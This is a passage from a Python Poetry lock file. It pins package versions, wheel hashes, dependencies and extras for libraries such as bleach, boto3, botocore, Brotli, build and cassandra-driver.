d = ["aiohttp (>=3.7.4)"]
jupyter = ["ipython (>=7.8.0)", "tokenize-rt (>=3.2.0)"]
uvloop = ["uvloop (>=0.15.2)"]

[[package]]
name = "bleach"
version = "6.1.0"
description = "An easy safelist-based HTML-sanitizing tool."
optional = false
python-versions = ">=3.8"
files = [
    {file = "bleach-6.1.0-py3-none-any.whl", hash = "sha256:3225f354cfc436b9789c66c4ee030194bee0568fbf9cbdad3bc8b5c26c5f12b6"},
    {file = "bleach-6.1.0.tar.gz", hash = "sha256:0a31f1837963c41d46bbf1331b8778e1308ea0791db03cc4e7357b97cf42a8fe"},
]

[package.dependencies]
six = ">=1.9.0"
webencodings = "*"

[package.extras]
css = ["tinycss2 (>=1.1.0,<1.3)"]

[[package]]
name = "blinker"
version = "1.6.3"
description = "Fast, simple object-to-object and broadcast signaling"
optional = true
python-versions = ">=3.7"
files = [
    {file = "blinker-1.6.3-py3-none-any.whl", hash = "sha256:296320d6c28b006eb5e32d4712202dbcdcbf5dc482da298c2f44881c43884aaa"},
    {file = "blinker-1.6.3.tar.gz", hash = "sha256:152090d27c1c5c722ee7e48504b02d76502811ce02e1523553b4cf8c8b3d3a8d"},
]

[[package]]
name = "boto3"
version = "1.28.64"
description = "The AWS SDK for Python"
optional = true
python-versions = ">= 3.7"
files = [
    {file = "boto3-1.28.64-py3-none-any.whl", hash = "sha256:a99150a30c038c73e89662836820a8cce914afab5ea377942a37c484b85f4438"},
    {file = "boto3-1.28.64.tar.gz", hash = "sha256:a5cf93b202568e9d378afdc84be55a6dedf11d30156289fe829e23e6d7dccabb"},
]

[package.dependencies]
botocore = ">=1.31.64,<1.32.0"
jmespath = ">=0.7.1,<2.0.0"
s3transfer = ">=0.7.0,<0.8.0"

[package.extras]
crt = ["botocore[crt] (>=1.21.0,<2.0a0)"]

[[package]]
name = "botocore"
version = "1.31.64"
description = "Low-level, data-driven core of boto 3."
optional = true
python-versions = ">= 3.7"
files = [
    {file = "botocore-1.31.64-py3-none-any.whl", hash = "sha256:7b709310343a5b430ec9025b2e17c0bac6b16c05f1ac1d9521dece3f10c71bac"},
    {file = "botocore-1.31.64.tar.gz", hash = "sha256:d8eb4b724ac437343359b318d73de0cfae0fecb24095827e56135b0ad6b44caf"},
]

[package.dependencies]
jmespath = ">=0.7.1,<2.0.0"
python-dateutil = ">=2.1,<3.0.0"
urllib3 = [
    {version = ">=1.25.4,<2.1", markers = "python_version >= \"3.10\""},
    {version = ">=1.25.4,<1.27", markers = "python_version < \"3.10\""},
]

[package.extras]
crt = ["awscrt (==0.16.26)"]

[[package]]
name = "brotli"
version = "1.1.0"
description = "Python bindings for the Brotli compression library"
optional = true
python-versions = "*"
files = [
    {file = "Brotli-1.1.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:e1140c64812cb9b06c922e77f1c26a75ec5e3f0fb2bf92cc8c58720dec276752"},
    {file = "Brotli-1.1.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c8fd5270e906eef71d4a8d19b7c6a43760c6abcfcc10c9101d14eb2357418de9"},
    {file = "Brotli-1.1.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1ae56aca0402a0f9a3431cddda62ad71666ca9d4dc3a10a142b9dce2e3c0cda3"},
    {file = "Brotli-1.1.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:43ce1b9935bfa1ede40028054d7f48b5469cd02733a365eec8a329ffd342915d"},
    {file = "Brotli-1.1.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:7c4855522edb2e6ae7fdb58e07c3ba9111e7621a8956f481c68d5d979c93032e"},
    {file = "Brotli-1.1.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:38025d9f30cf4634f8309c6874ef871b841eb3c347e90b0851f63d1ded5212da"},
    {file = "Brotli-1.1.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:e6a904cb26bfefc2f0a6f240bdf5233be78cd2488900a2f846f3c3ac8489ab80"},
    {file = "Brotli-1.1.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:a37b8f0391212d29b3a91a799c8e4a2855e0576911cdfb2515487e30e322253d"},
    {file = "Brotli-1.1.0-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:e84799f09591700a4154154cab9787452925578841a94321d5ee8fb9a9a328f0"},
    {file = "Brotli-1.1.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:f66b5337fa213f1da0d9000bc8dc0cb5b896b726eefd9c6046f699b169c41b9e"},
    {file = "Brotli-1.1.0-cp310-cp310-win32.whl", hash = "sha256:be36e3d172dc816333f33520154d708a2657ea63762ec16b62ece02ab5e4daf2"},
    {file = "Brotli-1.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:0c6244521dda65ea562d5a69b9a26120769b7a9fb3db2fe9545935ed6735b128"},
    {file = "Brotli-1.1.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:a3daabb76a78f829cafc365531c972016e4aa8d5b4bf60660ad8ecee19df7ccc"},
    {file = "Brotli-1.1.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:c8146669223164fc87a7e3de9f81e9423c67a79d6b3447994dfb9c95da16e2d6"},
    {file = "Brotli-1.1.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:30924eb4c57903d5a7526b08ef4a584acc22ab1ffa085faceb521521d2de32dd"},
    {file = "Brotli-1.1.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ceb64bbc6eac5a140ca649003756940f8d6a7c444a68af170b3187623b43bebf"},
    {file = "Brotli-1.1.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a469274ad18dc0e4d316eefa616d1d0c2ff9da369af19fa6f3daa4f09671fd61"},
    {file = "Brotli-1.1.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:524f35912131cc2cabb00edfd8d573b07f2d9f21fa824bd3fb19725a9cf06327"},
    {file = "Brotli-1.1.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:5b3cc074004d968722f51e550b41a27be656ec48f8afaeeb45ebf65b561481dd"},
    {file = "Brotli-1.1.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:19c116e796420b0cee3da1ccec3b764ed2952ccfcc298b55a10e5610ad7885f9"},
    {file = "Brotli-1.1.0-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:510b5b1bfbe20e1a7b3baf5fed9e9451873559a976c1a78eebaa3b86c57b4265"},
    {file = "Brotli-1.1.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:a1fd8a29719ccce974d523580987b7f8229aeace506952fa9ce1d53a033873c8"},
    {file = "Brotli-1.1.0-cp311-cp311-win32.whl", hash = "sha256:39da8adedf6942d76dc3e46653e52df937a3c4d6d18fdc94a7c29d263b1f5b50"},
    {file = "Brotli-1.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:aac0411d20e345dc0920bdec5548e438e999ff68d77564d5e9463a7ca9d3e7b1"},
    {file = "Brotli-1.1.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:316cc9b17edf613ac76b1f1f305d2a748f1b976b033b049a6ecdfd5612c70409"},
    {file = "Brotli-1.1.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:caf9ee9a5775f3111642d33b86237b05808dafcd6268faa492250e9b78046eb2"},
    {file = "Brotli-1.1.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:70051525001750221daa10907c77830bc889cb6d865cc0b813d9db7fefc21451"},
    {file = "Brotli-1.1.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:7f4bf76817c14aa98cc6697ac02f3972cb8c3da93e9ef16b9c66573a68014f91"},
    {file = "Brotli-1.1.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d0c5516f0aed654134a2fc936325cc2e642f8a0e096d075209672eb321cff408"},
    {file = "Brotli-1.1.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6c3020404e0b5eefd7c9485ccf8393cfb75ec38ce75586e046573c9dc29967a0"},
    {file = "Brotli-1.1.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:4ed11165dd45ce798d99a136808a794a748d5dc38511303239d4e2363c0695dc"},
    {file = "Brotli-1.1.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:4093c631e96fdd49e0377a9c167bfd75b6d0bad2ace734c6eb20b348bc3ea180"},
    {file = "Brotli-1.1.0-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:7e4c4629ddad63006efa0ef968c8e4751c5868ff0b1c5c40f76524e894c50248"},
    {file = "Brotli-1.1.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:861bf317735688269936f755fa136a99d1ed526883859f86e41a5d43c61d8966"},
    {file = "Brotli-1.1.0-cp312-cp312-win32.whl", hash = "sha256:5f4d5ea15c9382135076d2fb28dde923352fe02951e66935a9efaac8f10e81b0"},
    {file = "Brotli-1.1.0-cp312-cp312-win_amd64.whl", hash = "sha256:906bc3a79de8c4ae5b86d3d75a8b77e44404b0f4261714306e3ad248d8ab0951"},
    {file = "Brotli-1.1.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:a090ca607cbb6a34b0391776f0cb48062081f5f60ddcce5d11838e67a01928d1"},
    {file = "Brotli-1.1.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2de9d02f5bda03d27ede52e8cfe7b865b066fa49258cbab568720aa5be80a47d"},
    {file = "Brotli-1.1.0-cp36-cp36m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2333e30a5e00fe0fe55903c8832e08ee9c3b1382aacf4db26664a16528d51b4b"},
    {file = "Brotli-1.1.0-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:4d4a848d1837973bf0f4b5e54e3bec977d99be36a7895c61abb659301b02c112"},
    {file = "Brotli-1.1.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:fdc3ff3bfccdc6b9cc7c342c03aa2400683f0cb891d46e94b64a197910dc4064"},
    {file = "Brotli-1.1.0-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:5eeb539606f18a0b232d4ba45adccde4125592f3f636a6182b4a8a436548b914"},
    {file = "Brotli-1.1.0-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:fd5f17ff8f14003595ab414e45fce13d073e0762394f957182e69035c9f3d7c2"},
    {file = "Brotli-1.1.0-cp36-cp36m-musllinux_1_1_ppc64le.whl", hash = "sha256:069a121ac97412d1fe506da790b3e69f52254b9df4eb665cd42460c837193354"},
    {file = "Brotli-1.1.0-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:e93dfc1a1165e385cc8239fab7c036fb2cd8093728cbd85097b284d7b99249a2"},
    {file = "Brotli-1.1.0-cp36-cp36m-win32.whl", hash = "sha256:a599669fd7c47233438a56936988a2478685e74854088ef5293802123b5b2460"},
    {file = "Brotli-1.1.0-cp36-cp36m-win_amd64.whl", hash = "sha256:d143fd47fad1db3d7c27a1b1d66162e855b5d50a89666af46e1679c496e8e579"},
    {file = "Brotli-1.1.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:11d00ed0a83fa22d29bc6b64ef636c4552ebafcef57154b4ddd132f5638fbd1c"},
    {file = "Brotli-1.1.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f733d788519c7e3e71f0855c96618720f5d3d60c3cb829d8bbb722dddce37985"},
    {file = "Brotli-1.1.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:929811df5462e182b13920da56c6e0284af407d1de637d8e536c5cd00a7daf60"},
    {file = "Brotli-1.1.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:0b63b949ff929fbc2d6d3ce0e924c9b93c9785d877a21a1b678877ffbbc4423a"},
    {file = "Brotli-1.1.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:d192f0f30804e55db0d0e0a35d83a9fead0e9a359a9ed0285dbacea60cc10a84"},
    {file = "Brotli-1.1.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:f296c40e23065d0d6650c4aefe7470d2a25fffda489bcc3eb66083f3ac9f6643"},
    {file = "Brotli-1.1.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:919e32f147ae93a09fe064d77d5ebf4e35502a8df75c29fb05788528e330fe74"},
    {file = "Brotli-1.1.0-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:23032ae55523cc7bccb4f6a0bf368cd25ad9bcdcc1990b64a647e7bbcce9cb5b"},
    {file = "Brotli-1.1.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:224e57f6eac61cc449f498cc5f0e1725ba2071a3d4f48d5d9dffba42db196438"},
    {file = "Brotli-1.1.0-cp37-cp37m-win32.whl", hash = "sha256:587ca6d3cef6e4e868102672d3bd9dc9698c309ba56d41c2b9c85bbb903cdb95"},
    {file = "Brotli-1.1.0-cp37-cp37m-win_amd64.whl", hash = "sha256:2954c1c23f81c2eaf0b0717d9380bd348578a94161a65b3a2afc62c86467dd68"},
    {file = "Brotli-1.1.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:efa8b278894b14d6da122a72fefcebc28445f2d3f880ac59d46c90f4c13be9a3"},
    {file = "Brotli-1.1.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:03d20af184290887bdea3f0f78c4f737d126c74dc2f3ccadf07e54ceca3bf208"},
    {file = "Brotli-1.1.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6172447e1b368dcbc458925e5ddaf9113477b0ed542df258d84fa28fc45ceea7"},
    {file = "Brotli-1.1.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a743e5a28af5f70f9c080380a5f908d4d21d40e8f0e0c8901604d15cfa9ba751"},
    {file = "Brotli-1.1.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:0541e747cce78e24ea12d69176f6a7ddb690e62c425e01d31cc065e69ce55b48"},
    {file = "Brotli-1.1.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:cdbc1fc1bc0bff1cef838eafe581b55bfbffaed4ed0318b724d0b71d4d377619"},
    {file = "Brotli-1.1.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:890b5a14ce214389b2cc36ce82f3093f96f4cc730c1cffdbefff77a7c71f2a97"},
    {file = "Brotli-1.1.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:1ab4fbee0b2d9098c74f3057b2bc055a8bd92ccf02f65944a241b4349229185a"},
    {file = "Brotli-1.1.0-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:141bd4d93984070e097521ed07e2575b46f817d08f9fa42b16b9b5f27b5ac088"},
    {file = "Brotli-1.1.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:fce1473f3ccc4187f75b4690cfc922628aed4d3dd013d047f95a9b3919a86596"},
    {file = "Brotli-1.1.0-cp38-cp38-win32.whl", hash = "sha256:db85ecf4e609a48f4b29055f1e144231b90edc90af7481aa731ba2d059226b1b"},
    {file = "Brotli-1.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:3d7954194c36e304e1523f55d7042c59dc53ec20dd4e9ea9d151f1b62b4415c0"},
    {file = "Brotli-1.1.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:5fb2ce4b8045c78ebbc7b8f3c15062e435d47e7393cc57c25115cfd49883747a"},
    {file = "Brotli-1.1.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:7905193081db9bfa73b1219140b3d315831cbff0d8941f22da695832f0dd188f"},
    {file = "Brotli-1.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a77def80806c421b4b0af06f45d65a136e7ac0bdca3c09d9e2ea4e515367c7e9"},
    {file = "Brotli-1.1.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:8dadd1314583ec0bf2d1379f7008ad627cd6336625d6679cf2f8e67081b83acf"},
    {file = "Brotli-1.1.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:901032ff242d479a0efa956d853d16875d42157f98951c0230f69e69f9c09bac"},
    {file = "Brotli-1.1.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:22fc2a8549ffe699bfba2256ab2ed0421a7b8fadff114a3d201794e45a9ff578"},
    {file = "Brotli-1.1.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ae15b066e5ad21366600ebec29a7ccbc86812ed267e4b28e860b8ca16a2bc474"},
    {file = "Brotli-1.1.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:949f3b7c29912693cee0afcf09acd6ebc04c57af949d9bf77d6101ebb61e388c"},
    {file = "Brotli-1.1.0-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:89f4988c7203739d48c6f806f1e87a1d96e0806d44f0fba61dba81392c9e474d"},
    {file = "Brotli-1.1.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:de6551e370ef19f8de1807d0a9aa2cdfdce2e85ce88b122fe9f6b2b076837e59"},
    {file = "Brotli-1.1.0-cp39-cp39-win32.whl", hash = "sha256:f0d8a7a6b5983c2496e364b969f0e526647a06b075d034f3297dc66f3b360c64"},
    {file = "Brotli-1.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:cdad5b9014d83ca68c25d2e9444e28e967ef16e80f6b436918c700c117a85467"},
    {file = "Brotli-1.1.0.tar.gz", hash = "sha256:81de08ac11bcb85841e440c13611c00b67d3bf82698314928d0b676362546724"},
]

[[package]]
name = "brotlicffi"
version = "1.1.0.0"
description = "Python CFFI bindings to the Brotli library"
optional = true
python-versions = ">=3.7"
files = [
    {file = "brotlicffi-1.1.0.0-cp37-abi3-macosx_10_9_x86_64.whl", hash = "sha256:9b7ae6bd1a3f0df532b6d67ff674099a96d22bc0948955cb338488c31bfb8851"},
    {file = "brotlicffi-1.1.0.0-cp37-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:19ffc919fa4fc6ace69286e0a23b3789b4219058313cf9b45625016bf7ff996b"},
    {file = "brotlicffi-1.1.0.0-cp37-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9feb210d932ffe7798ee62e6145d3a757eb6233aa9a4e7db78dd3690d7755814"},
    {file = "brotlicffi-1.1.0.0-cp37-abi3-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:84763dbdef5dd5c24b75597a77e1b30c66604725707565188ba54bab4f114820"},
    {file = "brotlicffi-1.1.0.0-cp37-abi3-win32.whl", hash = "sha256:1b12b50e07c3911e1efa3a8971543e7648100713d4e0971b13631cce22c587eb"},
    {file = "brotlicffi-1.1.0.0-cp37-abi3-win_amd64.whl", hash = "sha256:994a4f0681bb6c6c3b0925530a1926b7a189d878e6e5e38fae8efa47c5d9c613"},
    {file = "brotlicffi-1.1.0.0-pp310-pypy310_pp73-macosx_10_9_x86_64.whl", hash = "sha256:2e4aeb0bd2540cb91b069dbdd54d458da8c4334ceaf2d25df2f4af576d6766ca"},
    {file = "brotlicffi-1.1.0.0-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4b7b0033b0d37bb33009fb2fef73310e432e76f688af76c156b3594389d81391"},
    {file = "brotlicffi-1.1.0.0-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:54a07bb2374a1eba8ebb52b6fafffa2afd3c4df85ddd38fcc0511f2bb387c2a8"},
    {file = "brotlicffi-1.1.0.0-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7901a7dc4b88f1c1475de59ae9be59799db1007b7d059817948d8e4f12e24e35"},
    {file = "brotlicffi-1.1.0.0-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:ce01c7316aebc7fce59da734286148b1d1b9455f89cf2c8a4dfce7d41db55c2d"},
    {file = "brotlicffi-1.1.0.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:246f1d1a90279bb6069de3de8d75a8856e073b8ff0b09dcca18ccc14cec85979"},
    {file = "brotlicffi-1.1.0.0-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cc4bc5d82bc56ebd8b514fb8350cfac4627d6b0743382e46d033976a5f80fab6"},
    {file = "brotlicffi-1.1.0.0-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:37c26ecb14386a44b118ce36e546ce307f4810bc9598a6e6cb4f7fca725ae7e6"},
    {file = "brotlicffi-1.1.0.0-pp37-pypy37_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ca72968ae4eaf6470498d5c2887073f7efe3b1e7d7ec8be11a06a79cc810e990"},
    {file = "brotlicffi-1.1.0.0-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:add0de5b9ad9e9aa293c3aa4e9deb2b61e99ad6c1634e01d01d98c03e6a354cc"},
    {file = "brotlicffi-1.1.0.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:9b6068e0f3769992d6b622a1cd2e7835eae3cf8d9da123d7f51ca9c1e9c333e5"},
    {file = "brotlicffi-1.1.0.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8557a8559509b61e65083f8782329188a250102372576093c88930c875a69838"},
    {file = "brotlicffi-1.1.0.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2a7ae37e5d79c5bdfb5b4b99f2715a6035e6c5bf538c3746abc8e26694f92f33"},
    {file = "brotlicffi-1.1.0.0-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:391151ec86bb1c683835980f4816272a87eaddc46bb91cbf44f62228b84d8cca"},
    {file = "brotlicffi-1.1.0.0-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:2f3711be9290f0453de8eed5275d93d286abe26b08ab4a35d7452caa1fef532f"},
    {file = "brotlicffi-1.1.0.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:1a807d760763e398bbf2c6394ae9da5815901aa93ee0a37bca5efe78d4ee3171"},
    {file = "brotlicffi-1.1.0.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fa8ca0623b26c94fccc3a1fdd895be1743b838f3917300506d04aa3346fd2a14"},
    {file = "brotlicffi-1.1.0.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3de0cf28a53a3238b252aca9fed1593e9d36c1d116748013339f0949bfc84112"},
    {file = "brotlicffi-1.1.0.0-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6be5ec0e88a4925c91f3dea2bb0013b3a2accda6f77238f76a34a1ea532a1cb0"},
    {file = "brotlicffi-1.1.0.0-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:d9eb71bb1085d996244439154387266fd23d6ad37161f6f52f1cd41dd95a3808"},
    {file = "brotlicffi-1.1.0.0.tar.gz", hash = "sha256:b77827a689905143f87915310b93b273ab17888fd43ef350d4832c4a71083c13"},
]

[package.dependencies]
cffi = ">=1.0.0"

[[package]]
name = "build"
version = "1.0.3"
description = "A simple, correct Python build frontend"
optional = true
python-versions = ">= 3.7"
files = [
    {file = "build-1.0.3-py3-none-any.whl", hash = "sha256:589bf99a67df7c9cf07ec0ac0e5e2ea5d4b37ac63301c4986d1acb126aa83f8f"},
    {file = "build-1.0.3.tar.gz", hash = "sha256:538aab1b64f9828977f84bc63ae570b060a8ed1be419e7870b8b4fc5e6ea553b"},
]

[package.dependencies]
colorama = {version = "*", markers = "os_name == \"nt\""}
importlib-metadata = {version = ">=4.6", markers = "python_version < \"3.10\""}
packaging = ">=19.0"
pyproject_hooks = "*"
tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""}

[package.extras]
docs = ["furo (>=2023.08.17)", "sphinx (>=7.0,<8.0)", "sphinx-argparse-cli (>=1.5)", "sphinx-autodoc-typehints (>=1.10)", "sphinx-issues (>=3.0.0)"]
test = ["filelock (>=3)", "pytest (>=6.2.4)", "pytest-cov (>=2.12)", "pytest-mock (>=2)", "pytest-rerunfailures (>=9.1)", "pytest-xdist (>=1.34)", "setuptools (>=42.0.0)", "setuptools (>=56.0.0)", "setuptools (>=56.0.0)", "setuptools (>=67.8.0)", "wheel (>=0.36.0)"]
typing = ["importlib-metadata (>=5.1)", "mypy (>=1.5.0,<1.6.0)", "tomli", "typing-extensions (>=3.7.4.3)"]
virtualenv = ["virtualenv (>=20.0.35)"]

[[package]]
name = "cachetools"
version = "5.3.2"
description = "Extensible memoizing collections and decorators"
optional = true
python-versions = ">=3.7"
files = [
    {file = "cachetools-5.3.2-py3-none-any.whl", hash = "sha256:861f35a13a451f94e301ce2bec7cac63e881232ccce7ed67fab9b5df4d3beaa1"},
    {file = "cachetools-5.3.2.tar.gz", hash = "sha256:086ee420196f7b2ab9ca2db2520aca326318b68fe5ba8bc4d49cca91add450f2"},
]

[[package]]
name = "cassandra-driver"
version = "3.28.0"
description = "DataStax Driver for Apache Cassandra"
optional = false
python-versions = "*"
files = [
    {file = "cassandra-driver-3.28.0.tar.gz", hash = "sha256:64ff130d19f994b80997c14343a8306be52a0e7ab92520a534eed944c88d70df"},
    {file = "cassandra_driver-3.28.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:a8cceb2cc658b3ebf28873f84aab4f28bbd5df23a6528a5b38ecf89a45232509"},
    {file = "cassandra_driver-3.28.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:35aef74e2a593a969b77a3fcf02d27e9b82a078d9aa66caa3bd2d2583c46a82c"},
    {file = "cassandra_driver-3.28.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:48f20e0d21b6c7406dfd8a4d9e07fddc3c7c3d6ad7d5b5d480bf82aac7068739"},
    {file = "cassandra_driver-3.28.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3820a421fb7e4cf215718dc35522869c5f933d4fd4c50fd43307d3ce5d9dd138"},
    {file = "cassandra_driver-3.28.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0dd9511fe5b85010e92199f6589e0733ab14ed3d2279dcc6ae504c0cef11d652"},
    {file = "cassandra_driver-3.28.0-cp310-cp310-win32.whl", hash = "sha256:887f7e3df9b34b41de6dfdd5f2ef8804c2d9782bbc39202eda9d3b67a3c8fe37"},
    {file = "cassandra_driver-3.28.0-cp310-cp310-win_amd64.whl", hash = "sha256:28c636239b15944103df18a12ef95e6401ceadd7b9aca2d59f4beccf9ca21e2d"},
    {file = "cassandra_driver-3.28.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:9232434459303b0e1a26fa65006fd8438475037aef4e6204a32dfaeb10e7f739"},
    {file = "cassandra_driver-3.28.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:634a553a5309a9faa08c3256fe0237ff0308152210211f3b8eab0664335560e0"},
    {file = "cassandra_driver-3.28.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:4a101114a7d93505ee79272edc82dba0cfc706172ad7948a6e4fb3dc1eb8b59c"},
    {file = "cassandra_driver-3.28.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:36d844ba0089111858fad3c53897b0fea7c91cedd8bd205eeb82fe22fd60e748"},
    {file = "cassandra_driver-3.28.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c3bf6bacb60dc8d1b8ba5ddd7d35772e3b98da951aed6bb148827aa9c38cd009"},
    {file = "cassandra_driver-3.28.0-cp311-cp311-win32.whl", hash = "sha256:212eb39ca99ab5960eb5c31ce279b61e075df02ac7a6209415982a3f8cfe1126"},
    {file = "cassandra_driver-3.28.0-cp311-cp311-win_amd64.whl", hash = "sha256:777f60ed821ec43d5b3f7a65eaf02decbd9cbc11e32f2099bfe9d7a6bfe33da9"},
    {file = "cassandra_driver-3.28.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:b867c49c3c9efa21923845456cfb3e81ad13a33e40eb20279f58b3642d54614f"},
